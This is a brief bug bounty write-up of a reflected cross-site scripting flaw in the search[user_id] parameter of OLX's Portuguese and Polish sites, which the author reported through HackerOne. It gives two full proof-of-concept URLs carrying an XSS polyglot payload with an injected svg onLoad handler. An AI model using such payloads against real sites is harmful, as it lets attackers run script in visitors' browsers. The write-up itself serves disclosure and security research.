A real XSS in OLX Bug Bounty

I saw a couple of other write-ups and blog posts about “XSS in OLX” but when I got to read them, they end up being either stored XSS or in some other website that belongs within the scope of OLX…

SO!!

I figured, “hey if they are good enough for a write-up, so it’s my bug.” xD

Original report: https://hackerone.com/reports/477771

I was looking for bugs on another website when I came across this.
It is a reflected Cross Site Scripting (XSS) vulnerability in the parameter search[user_id] located at the main page of Olx.pt

If you navigate to Olx.pt
and choose a random item, open that item page and click
“outros anúncios” as in “other ads”
you will get redirected to:

https://www.olx.pt/ads/?search%5Buser_id%5D=xxx&view=galleryWide

Within that page, the parameter search[user_id] was vulnerable to XSS.

POC:

https://www.olx.pt/braga/?search%5Buser_id%5D=1zqjeu'%22()%7B%7D<x>:/1zqjeu;9</SCript><svG/onLoad=prompt(9)>, ;prompt(9);&view=galleryWide

It was across all the domains, here is an example of it in Poland’s domain:

https://www.olx.pl/lubelskie/?search%5Buser_id%5D=1zqjeu'%22()%7B%7D<x>:/1zqjeu;9</SCript><svG/onLoad=prompt(9)>, ;prompt(9);&view=galleryWide

I reported it and got added to the OLX’s Hall of Fame:
https://security.olx.com/security-hall-of-fame.html

Kudos to me!! xD